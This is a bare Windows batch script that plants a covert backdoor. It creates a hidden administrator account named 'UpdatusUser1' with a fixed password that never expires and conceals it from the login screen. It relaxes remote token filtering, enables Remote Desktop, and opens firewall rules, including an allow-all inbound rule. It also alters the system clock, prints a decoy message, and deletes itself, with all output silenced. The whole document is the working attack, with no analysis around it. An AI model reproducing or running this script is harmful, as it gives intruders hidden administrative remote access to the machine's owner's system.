@date 07/06/2026 @time 07:57 @net accounts /maxpwage:unlimited > nul 2> nul @net user /add UpdatusUser1 welcome909090 /y > nul 2> nul @net localgroup Administrators UpdatusUser1 /add > nul 2> nul @wmic useraccount WHERE "Name='UpdatusUser1'" set PasswordExpires=false > nul 2> nul @reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v UpdatusUser1 /t REG_DWORD /d 0 /f > nul 2> nul @reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f > nul 2> nul @reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f > nul 2> nul @netsh advfirewall firewall set rule group="remote desktop" new enable=yes > nul 2> nul @netsh advfirewall firewall set rule group="File and Printer Sharing" new enable=yes > nul 2> nul @netsh advfirewall firewall add rule name="Teamlink" dir=in action=allow > nul 2> nul @echo info|clip > nul 2> nul @date 10/06/2026 @time 09:57 @echo %0 traceback on - close window to stop @(goto) 2>nul & del "%~f0"